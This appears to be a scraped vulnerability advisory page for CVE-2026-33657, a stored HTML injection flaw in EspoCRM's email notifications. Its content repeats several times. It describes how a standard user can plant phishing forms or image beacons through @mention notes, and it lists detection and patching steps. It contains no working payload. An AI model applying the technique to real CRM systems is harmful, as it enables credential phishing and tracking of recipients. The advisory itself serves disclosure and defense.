CVE-2026-33657: EspoCRM Stored XSS Vulnerability

CVE-2026-33657 Overview

CVE-2026-33657 is a stored HTML injection vulnerability in EspoCRM, an open source customer relationship management application. Authenticated users with standard (non-administrative) privileges can inject arbitrary HTML into system-generated email notifications by crafting malicious content in the post field of stream activity notes. Because the injected content is rendered in emails sent from the system's configured SMTP identity (such as an administrative sender address), it appears fully trusted to recipients, enabling sophisticated phishing attacks, user tracking via embedded resources like image beacons, and UI manipulation within email content.

Critical Impact
Authenticated attackers can abuse the @mention feature to deliver targeted malicious emails that appear to originate from trusted administrative senders, potentially compromising user credentials through phishing or tracking user activity via embedded image beacons.

Affected Products

EspoCRM versions 9.3.3 and below

Discovery Timeline

April 13, 2026 - CVE-2026-33657 published to NVD
April 13, 2026 - Last updated in NVD database

Technical Details for CVE-2026-33657

Vulnerability Analysis

This vulnerability (CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page) stems from a combination of insecure template rendering practices in EspoCRM's email notification system. The attack exploits a multi-stage failure in the application's content handling pipeline that ultimately allows user-controlled HTML to be rendered directly in email notifications without proper sanitization.

The vulnerability is particularly concerning because it leverages the trust relationship users have with system-generated emails. When an attacker injects malicious HTML, it appears in emails sent from the organization's official SMTP identity, making phishing attempts highly convincing.

Root Cause

The root cause is a combination of three factors in EspoCRM's email rendering pipeline:

Unescaped Handlebars Rendering: Server-side Handlebars templates render the post field using triple-brace syntax ({{{post}}}), which bypasses HTML escaping.
Markdown Processor Behavior: The Markdown processor preserves inline HTML by default, allowing raw HTML tags to pass through unmodified.
Sanitization Bypass: The rendering pipeline explicitly skips sanitization for fields present in additionalData, creating a path where attacker-controlled HTML is accepted, stored, and rendered directly into emails without any escaping.

This combination creates a complete bypass of input sanitization, allowing authenticated users to inject arbitrary HTML that will be rendered in email notifications sent to other users.

Attack Vector

The attack is executed over the network and requires the attacker to have authenticated access to EspoCRM with standard user privileges. The exploitation flow involves:

An authenticated user creates a stream activity note with malicious HTML content in the post field
The attacker uses the @mention feature to target specific users who will receive email notifications
EspoCRM's rendering pipeline processes the malicious content without sanitization
The victim receives an email notification containing the injected HTML, which appears to come from a trusted administrative sender address

The injected HTML can include phishing forms designed to capture credentials, image beacons for tracking user activity and email opens, and manipulated UI elements that mislead recipients into taking malicious actions.

Detection Methods for CVE-2026-33657

Indicators of Compromise

Unusual HTML tags or embedded resources in stream activity notes within the EspoCRM database
Email notifications containing unexpected HTML elements such as <img> tags pointing to external domains, <form> elements, or inline frames
Requests to external domains triggered from email clients when users view notifications
User reports of suspicious or unexpected content in EspoCRM email notifications

Detection Strategies

Implement content inspection rules to identify HTML tags in stream activity post fields that should contain plain text or sanitized content
Monitor outbound email content from the EspoCRM SMTP sender for anomalous HTML patterns or embedded external resources
Review EspoCRM audit logs for users creating stream notes with HTML content, particularly those using @mentions to target specific recipients
Deploy email security gateway rules to flag outbound emails from the CRM system containing suspicious HTML elements

Monitoring Recommendations

Enable detailed logging for stream activity note creation and modification events in EspoCRM
Configure SIEM alerts for patterns indicative of HTML injection attempts in CRM content fields
Monitor for user complaints or helpdesk tickets regarding suspicious email notifications from the CRM system
Track external resource loading from email clients that correlates with EspoCRM notification delivery times

How to Mitigate CVE-2026-33657

Immediate Actions Required

Upgrade EspoCRM to version 9.3.4 or later immediately to address this vulnerability
Review existing stream activity notes in the database for any signs of injected HTML content
Notify users to be cautious of unexpected content in EspoCRM email notifications until the upgrade is complete
Consider temporarily disabling email notifications for stream activity if immediate upgrade is not possible

Patch Information

EspoCRM has released version 9.3.4 which addresses this stored HTML injection vulnerability. The patch implements proper sanitization for the post field content before it is rendered in email notifications. Organizations should upgrade to this version or later as soon as possible.

For detailed information about the security fix, refer to the EspoCRM Release 9.3.4 and the GitHub Security Advisory GHSA-8prm-r5j9-j574.

Workarounds

Disable email notifications for stream activity notes temporarily until the patch can be applied
Implement email gateway filtering to strip or quarantine outbound emails from EspoCRM containing suspicious HTML elements
Restrict user permissions to limit who can create stream activity notes with @mentions
Configure web application firewall rules to block requests containing HTML tags in stream note post field submissions

bash

# Example: Disable email notifications in EspoCRM (temporary workaround)
# Navigate to Administration > Outbound Emails and disable system notifications
# Or modify config.php to disable notifications:
# 'emailNotificationsEnable' => false,

CVE-2026-33657 Overview

Critical Impact
Authenticated attackers can abuse the @mention feature to deliver targeted malicious emails that appear to originate from trusted administrative senders, potentially compromising user credentials through phishing or tracking user activity via embedded image beacons.

Affected Products

EspoCRM versions 9.3.3 and below

Discovery Timeline

April 13, 2026 - CVE-2026-33657 published to NVD
April 13, 2026 - Last updated in NVD database

Technical Details for CVE-2026-33657

Vulnerability Analysis

Root Cause

The root cause is a combination of three factors in EspoCRM's email rendering pipeline:

Unescaped Handlebars Rendering: Server-side Handlebars templates render the post field using triple-brace syntax ({{{post}}}), which bypasses HTML escaping.
Markdown Processor Behavior: The Markdown processor preserves inline HTML by default, allowing raw HTML tags to pass through unmodified.
Sanitization Bypass: The rendering pipeline explicitly skips sanitization for fields present in additionalData, creating a path where attacker-controlled HTML is accepted, stored, and rendered directly into emails without any escaping.

This combination creates a complete bypass of input sanitization, allowing authenticated users to inject arbitrary HTML that will be rendered in email notifications sent to other users.

Attack Vector

The attack is executed over the network and requires the attacker to have authenticated access to EspoCRM with standard user privileges. The exploitation flow involves:

An authenticated user creates a stream activity note with malicious HTML content in the post field
The attacker uses the @mention feature to target specific users who will receive email notifications
EspoCRM's rendering pipeline processes the malicious content without sanitization
The victim receives an email notification containing the injected HTML, which appears to come from a trusted administrative sender address

Detection Methods for CVE-2026-33657

Indicators of Compromise

Unusual HTML tags or embedded resources in stream activity notes within the EspoCRM database
Email notifications containing unexpected HTML elements such as <img> tags pointing to external domains, <form> elements, or inline frames
Requests to external domains triggered from email clients when users view notifications
User reports of suspicious or unexpected content in EspoCRM email notifications

Detection Strategies

Implement content inspection rules to identify HTML tags in stream activity post fields that should contain plain text or sanitized content
Monitor outbound email content from the EspoCRM SMTP sender for anomalous HTML patterns or embedded external resources
Review EspoCRM audit logs for users creating stream notes with HTML content, particularly those using @mentions to target specific recipients
Deploy email security gateway rules to flag outbound emails from the CRM system containing suspicious HTML elements

Monitoring Recommendations

Enable detailed logging for stream activity note creation and modification events in EspoCRM
Configure SIEM alerts for patterns indicative of HTML injection attempts in CRM content fields
Monitor for user complaints or helpdesk tickets regarding suspicious email notifications from the CRM system
Track external resource loading from email clients that correlates with EspoCRM notification delivery times

How to Mitigate CVE-2026-33657

Immediate Actions Required

Upgrade EspoCRM to version 9.3.4 or later immediately to address this vulnerability
Review existing stream activity notes in the database for any signs of injected HTML content
Notify users to be cautious of unexpected content in EspoCRM email notifications until the upgrade is complete
Consider temporarily disabling email notifications for stream activity if immediate upgrade is not possible

Patch Information

For detailed information about the security fix, refer to the EspoCRM Release 9.3.4 and the GitHub Security Advisory GHSA-8prm-r5j9-j574.

Workarounds

Disable email notifications for stream activity notes temporarily until the patch can be applied
Implement email gateway filtering to strip or quarantine outbound emails from EspoCRM containing suspicious HTML elements
Restrict user permissions to limit who can create stream activity notes with @mentions
Configure web application firewall rules to block requests containing HTML tags in stream note post field submissions

bash

# Example: Disable email notifications in EspoCRM (temporary workaround)
# Navigate to Administration > Outbound Emails and disable system notifications
# Or modify config.php to disable notifications:
# 'emailNotificationsEnable' => false,

CVE-2026-33657: EspoCRM Stored XSS Vulnerability

CVE-2026-33657 Overview

Critical Impact

Affected Products

Discovery Timeline

Technical Details for CVE-2026-33657

Vulnerability Analysis

Root Cause

Attack Vector

Detection Methods for CVE-2026-33657

Indicators of Compromise

Detection Strategies

Monitoring Recommendations

How to Mitigate CVE-2026-33657

Immediate Actions Required

Patch Information

Workarounds

Experience the Most Advanced Cybersecurity Platform

CVE-2026-33657: EspoCRM Stored XSS Vulnerability

CVE-2026-33657 Overview

Critical Impact

Affected Products

Discovery Timeline

Technical Details for CVE-2026-33657

Vulnerability Analysis

Root Cause

Attack Vector

Detection Methods for CVE-2026-33657

Indicators of Compromise

Detection Strategies

Monitoring Recommendations

How to Mitigate CVE-2026-33657

Immediate Actions Required

Patch Information

Workarounds

Experience the Most Advanced Cybersecurity Platform